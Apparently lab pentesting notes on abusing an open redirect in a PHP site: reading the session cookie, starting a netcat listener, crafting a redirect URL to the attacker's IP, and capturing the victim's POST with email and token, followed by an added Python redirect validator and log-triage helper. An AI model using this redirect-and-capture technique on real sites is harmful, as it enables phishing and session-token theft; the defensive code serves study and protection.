CREDENTIAL THEFT
#an open redirect lets an attacker craft a URL that appears to belong to the legitimate site but sends the user on to a phishing page
#users think they are logging into the real service, and their credentials (or tokens) end up with the attacker
#walk the application
root@oco:~$ BROWSER > {targetSite:port}
...
* submit expected input and identify potential entry points
#open redirect vulnerability
root@oco:~$ BROWSER > {targetSite:port} > F12 > Storage > Cookies > siteCookieValues
Name: PHPSESSID (aka token)
Value: ntrgep8modbid35j2me2thjjjt
* if a token is included in the GET/POST request, it must be carried through in the crafted request: it may be a session or anti-CSRF token and is therefore useful to an attacker
root@oco:~$ nc -nlvp 4444
root@oco:~$ BROWSER > {targetSite:port}/index.php?url={attackerNetcatListenerIP&Port}&token={tokenValue}
* the target must submit a form on the redirected page for this to work
- e.g., entering an email address into the password-reset form
root@oco:~$ nc...
listening on [any] 4444 ...
connect to [10.10.14.35] from (UNKNOWN) [10.10.14.35] 41650
POST / HTTP/1.1
Host: 10.10.14.35:4444
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://oredirect.htb.net/
Content-Type: application/x-www-form-urlencoded
Content-Length: 84
Origin: http://oredirect.htb.net
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Sec-GPC: 1
Priority: u=0, i
email=null%40null.com&recover-submit=Reset+Password&token=ntrgep8modbid35j2me2thjjjt
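The defensive counterpart to the capture above, as an added example that is not part of the original notes: a server-side redirect validator (written in Python for illustration; the target application itself is PHP) that would reject the url= value used in the crafted request, plus a helper that flags such values in access-log lines. The allow-list host and the log lines are constructed for the example.

```python
from urllib.parse import parse_qs, urlsplit, urlunsplit

# Hosts this application may redirect to. Constructed allow-list; the host name is taken from the captured Referer header.
ALLOWED_HOSTS = {"oredirect.htb.net"}

def safe_redirect_target(url, fallback="/"):
    """Return `url` if it stays on an allowed host, otherwise `fallback`."""
    if not url:
        return fallback
    # Browsers treat '\' like '/', so normalise before parsing; otherwise
    # '/\evil.example' would look like a harmless site-relative path.
    candidate = url.replace("\\", "/")
    try:
        parts = urlsplit(candidate)
    except ValueError:          # e.g. malformed IPv6 literal in the netloc
        return fallback
    if parts.scheme and parts.scheme not in ("http", "https"):
        return fallback         # javascript:, data:, ...
    if parts.netloc:
        # Compare the parsed hostname, not the raw netloc, so 'user@' and
        # port tricks cannot smuggle a foreign host past the allow-list.
        if (parts.hostname or "") not in ALLOWED_HOSTS:
            return fallback
        return urlunsplit((parts.scheme or "https", parts.hostname,
                           parts.path or "/", parts.query, ""))
    # No host part: accept only a path that starts with exactly one '/'
    if not candidate.startswith("/") or candidate.startswith("//"):
        return fallback
    return urlunsplit(("", "", parts.path, parts.query, ""))

def flag_offsite_redirects(log_lines):
    """Return url= values from access-log lines that the validator rejects (triage for open-redirect abuse)."""
    flagged = []
    for line in log_lines:
        request = line.split('"')[1]              # 'GET /index.php?... HTTP/1.1'
        query = urlsplit(request.split(" ")[1]).query
        for value in parse_qs(query).get("url", []):
            if safe_redirect_target(value, fallback=None) is None:
                flagged.append(value)
    return flagged

# Constructed access-log lines (not taken from the original capture).
SAMPLE_LOG = [
    '10.10.14.35 - - [01/Jan/2025:12:00:00 +0000] "GET /index.php?url=http://10.10.14.35:4444&token=abc HTTP/1.1" 302 0',
    '10.10.14.35 - - [01/Jan/2025:12:00:01 +0000] "GET /index.php?url=//evil.example&token=abc HTTP/1.1" 302 0',
    '10.10.14.35 - - [01/Jan/2025:12:00:02 +0000] "GET /index.php?url=/account&token=abc HTTP/1.1" 302 0',
]
```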